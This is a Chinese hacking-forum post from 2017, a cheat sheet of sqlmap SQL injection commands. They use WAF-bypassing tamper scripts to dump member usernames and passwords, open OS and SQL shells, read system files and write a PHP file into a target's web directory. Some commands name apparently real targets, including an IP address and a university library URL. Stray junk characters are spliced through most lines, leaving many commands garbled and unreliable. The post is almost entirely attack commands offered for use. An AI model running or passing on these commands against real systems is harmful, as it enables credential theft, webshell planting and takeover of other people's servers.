找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1669|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap' f* N  W) G- s" s( T

* U% N; _' s$ x+ h( U9 X' r6 Xupdate :::::>     in the folder   after  execute    following   order : svn update
6 G) P9 C; y* \7 x
+ F/ @- }: |$ G% s) A: C: c5 wsqlmap.py -r 1.txt --current-db5 _$ m# N; [% |# A2 m: {

/ j% s; k. W$ y* I! }7 q$ ev 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
' ]3 S' p0 A. G6 x2 t$ s  h+ C( K: T- H" ?9 l. _. }$ d
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
  x9 s) R0 y/ q3 ^9 r/ q% u猜解数据库- L/ I/ Y6 l; \, @& b+ ~
./sqlmap.py -u "injection-url" --dbs* _; r6 @, {" `
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
4 \, g8 ]1 w, S" b4 s* c: p* ?1 U0 Z) f* H8 Z8 P) r
猜解表名
& f7 z' `' U( x( @./sqlmap.py -u "injection-url" -D database_name --tables
9 P* r. J; l: K, M! p0 |6 A8 W: g! Y* q+ B
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py": V9 J& W% [. M. L/ }% V5 A
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" " l- Z3 W+ I; `- Q; L5 Z4 o

' p! d, Q6 I& U% H# V3 X/ q  f+ Lsqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump8 m4 Z$ E" H2 @' B! x' `) z/ v3 P* u
5 ^% J9 _4 U* T. d, f
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
7 c- ]. ]) B5 r8 Z- f, dsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
  J9 r; O1 d; I. B* [! A3 v, asqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" , m% x4 z, U- `+ t" L, E* k
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"' t) I5 Z8 c: g' H# k
& t5 b5 O( D( E  K5 ]
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"4 V7 {0 @- I9 @3 X% N/ E
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
$ U  D& I+ i; u* b" {sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py". V! b# w6 Z5 E5 E4 F1 q, i* U
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
: K# E0 @. i  B6 U, {* I7 i2 vsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump" v% Z9 U4 Q- @( {/ ^! n. R
# n: H4 [. I9 v1 x) u
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了8 W+ R' O/ Z% h. n
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"$ u4 f* h& L# c/ n  j  a1 v

- h. K- D2 q* b+ h4 F8 jsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
9 q' ?" t+ E9 s: X/ T猜解列名
; {) r8 {0 F: {./sqlmap.py -u "injection-url" -D database_name -T table_name --columns$ w6 P6 f7 O+ M, o/ ]9 g( z2 M

2 F3 S7 Z4 j( bsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
4 n& k* C) u% f# @; rsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
  F0 m& Q- {  i) x9 S& V6 Bsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
$ ?2 c7 R8 m& O+ R  A  Q- u* u& O6 X$ {6 b, ^, W( G
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
# l0 O! W& h) \7 X' ?0 @8 H&submit=Go
' D* a; G5 J; s  M猜解值+ u: A7 s3 Z( p, M; K' W; A
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
4 V- u/ U* t5 x: I. p========================================================1 N" U- l; J0 K$ h
搜索表名中包括mana字符的
$ j5 `7 l. ?0 w9 ]; ~9 N! C" o/sqlmap.py -u "injection-url" -T mana --search
6 \; S; X9 U" e4 J返回一个交互式sql shell
) b* M7 Z8 h! n/sqlmap.py -u "injection-url" --sql-shell
8 x" d7 a4 V; Y$ N9 R读取指定文件(需权限)
8 ?& l" Q6 {8 ?3 \9 H1 |: T/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"% Y, n# Y' b# b, S. G5 F) d6 E* V
查看当前 用户 及 数据库
+ m, s* d4 Z# m; T/sqlmap.py -u "injection-url" --current-user --current-db
5 V8 @" g+ X- X7 n本地文件 写入 远程目标绝对路径
* j% c- M: \+ D: Z. \( ^/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
/ T+ \+ }9 z) h& ?7 q! {7 Ksqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" 4 x/ n# }# [6 X+ z3 ~
7 L) X: M6 L& V9 B
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
/ E( {+ y. }% h# E4 z; @8 m查看某用的权限
( O6 b! [! v+ v% W0 Q: @/sqlmap.py -u "injection-url" --privileges -U root6 k( ~0 L% t6 A
查看当前用户是否为dba
7 I: b* C9 K! ]; W/sqlmap.py -u "injection-url" --is-dba
6 k/ f/ a" t8 u) a% U读取所有数据库用户或指定数据库用户的密码3 t) U# J* r; b+ i6 n. o$ }
sqlmap.py -r 1.txt --users --passwords
( |2 m+ Y! X) ]2 m6 z: X1 wsqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
. Q, f7 a' r& G! e' D
: s8 ?8 n( ?) v* I1 L/sqlmap.py -u "injection-url" --passwords -U root6 U# X1 ~3 s- }8 F6 u. o( E* ^
% F/ u7 l" Z; Z
--start&&--stop 与 --first&&--last 的区别
, Z$ M9 M( m1 A. M. g7 o2 a/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)& T7 ]. J, A3 v* F
2 `6 y' l+ u8 ~
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
8 v3 g# c* U( T+ y/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables* {( K, x6 F# R/ b0 B
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns8 ]5 E1 e2 w9 A2 m+ i" a
; ]2 o7 E! B: ]9 u' J8 Z
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)2 M- a! E! ~+ o0 f
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"& t. E4 o3 H. \0 a0 L
6 }! X: c4 S1 H" M/ O2 R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表